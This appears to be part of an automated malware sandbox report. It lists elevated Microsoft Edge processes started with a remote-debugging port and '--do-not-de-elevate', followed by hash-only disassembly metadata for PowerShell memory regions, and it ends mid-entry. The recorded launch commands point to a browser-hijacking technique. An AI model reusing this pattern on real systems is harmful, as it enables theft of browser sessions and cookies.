                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                                                                            Start time:01:11:02
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                            Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                                                                            Start time:01:11:04
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                            Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                                                                            Start time:01:11:04
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2696 --field-trial-handle=2632,i,14551711620527519390,4323206914128980996,262144 /prefetch:3
                                                                                                                                                                                                                                                                            Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                                                                                            Start time:01:11:04
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:3
                                                                                                                                                                                                                                                                            Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                                                                                                            Start time:01:11:09
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5340 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                                                                                                                                                                                                                                                                            Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                                                                                            Start time:01:11:09
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6652 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                                                                                                                                                                                                                                                                            Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                                                                                            Start time:01:11:10
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                                                                                                                                                                                                                                                                            Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                            File size:1'255'976 bytes
                                                                                                                                                                                                                                                                            MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                                                                                            Start time:01:11:10
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                                                                                                                                                                                                                                                                            Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                            File size:1'255'976 bytes
                                                                                                                                                                                                                                                                            MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                                              Function 00007FFD346AA612 Relevance: .2, Instructions: 221COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2243436438.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 33bf4caa1acc05979bec34b2f3547fd9ee5fef031facbebc6c55b4af32005809
                                                                                                                                                                                                                                                                              • Instruction ID: 20513afb69140042b52e1737dbcce724cdd00c2e48fe467dcecd4442c16ffc71
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33bf4caa1acc05979bec34b2f3547fd9ee5fef031facbebc6c55b4af32005809
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0351F9B2B0DFA51FE7619E5C9CAA2D97BE0EF53324B08407BC248C7083DA1964079792
                                                                                                                                                                                                                                                                              Function 00007FFD34773DAF Relevance: .7, Instructions: 694COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2244055635.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 3b6fe98c49d8f855cbde24b050dba683532e2f2e54b411b34b1cfc6f4b7320ad
                                                                                                                                                                                                                                                                              • Instruction ID: 6bf99cdee7eddb503b79c503076a63aabc7d9489312a220b82b8d8a7e7fc362d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b6fe98c49d8f855cbde24b050dba683532e2f2e54b411b34b1cfc6f4b7320ad
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0122462B0DA868FE7969A285CA51747FE1EF87320B4941FBD28DC3193DD5CB806D381
                                                                                                                                                                                                                                                                              Function 00007FFD346A9405 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2243436438.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 66fb743ea1a9018e6aa721f1016c90f51b5ad9d527408402ff3a0f650359e39c
                                                                                                                                                                                                                                                                              • Instruction ID: ade03e345b616f5903a5e2e0a62fca722b895957e597ed55b7f93e43c68db4fa
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66fb743ea1a9018e6aa721f1016c90f51b5ad9d527408402ff3a0f650359e39c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA31147191CF884FDB58DF5C984A6A97BE0FB59320F00426FE049C3252DB74A855CBC2
                                                                                                                                                                                                                                                                              Function 00007FFD3458E620 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2242971489.00007FFD3458D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3458D000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd3458d000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: b1ce520ee313e95b7d24ff090e02dde04cd336f24725ef9452a6653dfc93a679
                                                                                                                                                                                                                                                                              • Instruction ID: 6bad92a334095329c66902485817cf6fedec9835cbbe3c39e2a1bb26f6bf7485
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1ce520ee313e95b7d24ff090e02dde04cd336f24725ef9452a6653dfc93a679
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1041463090DBC44FE7978B2998559523FF0EF53320B1505DFD088CB0A3DA29A846C793
                                                                                                                                                                                                                                                                              Function 00007FFD3477426F Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2244055635.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: e05ffdb0ba3602e69285a39627396aaae22558f5b0ecdf7df7e02b1047858f27
                                                                                                                                                                                                                                                                              • Instruction ID: 05b23d918b2aa3fe7ee6fe5baa88d9bb11ded2fea56328806fa37c728017be8b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e05ffdb0ba3602e69285a39627396aaae22558f5b0ecdf7df7e02b1047858f27
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC21D2A2B0EA578FE7A5DA1C88E11743BC1EF46314B9941BAD69DC71A2CD5CFC109381
                                                                                                                                                                                                                                                                              Function 00007FFD346A9EFC Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2243436438.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: f63123942239674242b448def11fc578944c8880ba3d9bdb998eb9c3406758d0
                                                                                                                                                                                                                                                                              • Instruction ID: 87da0e0f7cec0fed795d7caaa167eb728e50f4df12119df5f6dee905747261b1
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f63123942239674242b448def11fc578944c8880ba3d9bdb998eb9c3406758d0
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BE06D74408A8C8FCB06EF28C4586957FA0EB25205F01419BE449C7021DB719558CBC2
                                                                                                                                                                                                                                                                              Function 00007FFD347769CE Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2244055635.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 628d7496391a5b5ff842d7a5c8eeb15101e0282e762e223332c2d6b59ba76397
                                                                                                                                                                                                                                                                              • Instruction ID: a25a8a4175fda12e9967d3db4dde24d2dc317356ca085e7fbd8fd2e312efc7e5
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 628d7496391a5b5ff842d7a5c8eeb15101e0282e762e223332c2d6b59ba76397
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F41123B2B0D6898FEBA5EA5844A01B87BD1EF4A320F5480BEC54DD71A3DD29A805C350
                                                                                                                                                                                                                                                                              Function 00007FFD347742D2 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2244055635.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 187d416ec05d95e45a389b62a473a0dcbeb7f7ec8002cde201fb36c26828123d
                                                                                                                                                                                                                                                                              • Instruction ID: 785fdd2e5691d04200528276bcb11bb6b27f926af9c8028956f8d746936c423d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 187d416ec05d95e45a389b62a473a0dcbeb7f7ec8002cde201fb36c26828123d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD01D272B0DA858FEBA5DB1C88A04647BD1EF0632078540FAD19CCB0A3CE28FC54C781
                                                                                                                                                                                                                                                                              Function 00007FFD347742DA Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2244055635.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 9cf9833af275c33f26c79d4083025a3755e8a03b622ac4861918292aaaa80b63
                                                                                                                                                                                                                                                                              • Instruction ID: 43977ef1b7dfd0ee32df5e7b93cfb2b8d27daadd335b339e6e886490eacb1644
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9cf9833af275c33f26c79d4083025a3755e8a03b622ac4861918292aaaa80b63
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB01B172B0D6858FE769EB1C98E54B47BD0EF4632075540BAD19CD71A3CD29BC44D381
                                                                                                                                                                                                                                                                              Function 00007FFD346A33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2243436438.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                              • Instruction ID: 24aef6e58671a62f14222a864d5608cc4645e75a5eb2213a00036e05fa3ae6e9
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1401677121CB0C4FD784EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45
                                                                                                                                                                                                                                                                              Function 00007FFD3477430A Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2244055635.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: bd63c6e91e98c00bb8d42770af42499ad45680777757159b34a06a3d0519bc0e
                                                                                                                                                                                                                                                                              • Instruction ID: 054a0bd3fad5fb5f2af99c6ddc8d8d8d2f9d427ae32f003bcda961fe09e33672
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd63c6e91e98c00bb8d42770af42499ad45680777757159b34a06a3d0519bc0e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2E0ED3170C5488FD768DB0CE4949E877E1EB4933575541A7D19DD7162C625EC52C780
                                                                                                                                                                                                                                                                              Function 00007FFD347745D2 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2244055635.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 18c8b7c97fa0199b5a3593dbb635257ecd443568e0774b373a077d65fa371e06
                                                                                                                                                                                                                                                                              • Instruction ID: 4b47105b355e499d1300c83cf7a50efc2b927df4a27d34ec2e73e7bfccba6246
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18c8b7c97fa0199b5a3593dbb635257ecd443568e0774b373a077d65fa371e06
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25D01732A0C0188EA6189A48E4914F873E0EB46331B948076D24EDA416DA26B851D694
                                                                                                                                                                                                                                                                              Function 00007FFD347745B5 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2244055635.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 72c4e030faf3e07e110b7cf085e0bd344c463b730de7bdd17436d05e45e5338c
                                                                                                                                                                                                                                                                              • Instruction ID: 9877954fe2119692d8a9adc146e0c90a3c1526fd986ee8f3a14b85c534904e1d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72c4e030faf3e07e110b7cf085e0bd344c463b730de7bdd17436d05e45e5338c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DD0C9716196858FD7A2EB6888A55547BF0FF0731035600EAE089CB1A3D969EC44C741
                                                                                                                                                                                                                                                                              Function 00007FFD347745CA Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2244055635.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd34770000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 84b30d3ec5640a0fa9eea6b1332e0b702f74457e74cd14fb3499f1e7e6511d8a
                                                                                                                                                                                                                                                                              • Instruction ID: 39e365ffbb755e73785bbd097c9daef17baf7cee7033f787162c8ec7a244d194
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84b30d3ec5640a0fa9eea6b1332e0b702f74457e74cd14fb3499f1e7e6511d8a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41A002301114148FC280DB19C848D853BA5FF0460274210D0E106CB532DA21DC44CB50

                                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                                              Function 00007FFD346A891B Relevance: 5.2, Strings: 4, Instructions: 197COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2243436438.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID: N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                                                              • API String ID: 0-3900292545
                                                                                                                                                                                                                                                                              • Opcode ID: a47559913204d078e1bbfd2bebe7e071c6fe4e110bf9828608d0f57e998d3d79
                                                                                                                                                                                                                                                                              • Instruction ID: 4d464ca9567e3ca4a51bbce56a4a7933c8a6ce9976e1cf6adb70c62e3bf73d2b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a47559913204d078e1bbfd2bebe7e071c6fe4e110bf9828608d0f57e998d3d79
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54618892A0FAE21FE7568A684C761D97FD0AF53214B0850FBC6C4CB1D7E91C5C069343
                                                                                                                                                                                                                                                                              Function 00007FFD346A16D1 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2243436438.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID: ,O_^
                                                                                                                                                                                                                                                                              • API String ID: 0-26621967
                                                                                                                                                                                                                                                                              • Opcode ID: 8d2c45179fe95dbb68229596caa4235fdcb41fa4ed976d09f45c7adb65a89629
